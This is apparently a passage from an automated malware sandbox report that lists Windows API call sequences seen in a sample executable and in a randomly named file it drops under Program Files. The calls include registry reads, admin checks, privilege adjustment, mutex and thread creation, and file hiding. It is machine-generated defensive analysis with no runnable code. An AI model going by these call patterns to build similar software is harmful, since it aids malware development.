Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,1_2_00402D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,22_2_012E1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,22_2_012ED970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,22_2_01302B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,22_2_01302BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,22_2_012FADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,22_2_013025C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,22_2_01301460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,22_2_01303CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,22_2_012F5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,22_2_01303F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,22_2_012E7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,22_2_012FCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,22_2_012E1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,22_2_01301690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,25_2_01591170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,25_2_0159D970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,25_2_015B2B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,25_2_015B2BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,25_2_015B25C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,25_2_015AADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,25_2_015B1460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,25_2_015B3CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,25_2_015B3F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,25_2_015A5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,25_2_01597FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,25_2_01591660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,25_2_01593610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,25_2_015ACE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,25_2_015B1690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,27_2_00AE1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,27_2_00AED970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,27_2_00B02BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,27_2_00B02B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,27_2_00B03CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,27_2_00B01460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,27_2_00AFADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,27_2_00B025C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,27_2_00B01690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,27_2_00AFCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,27_2_00AE1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,27_2_00AE7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,27_2_00AF5720
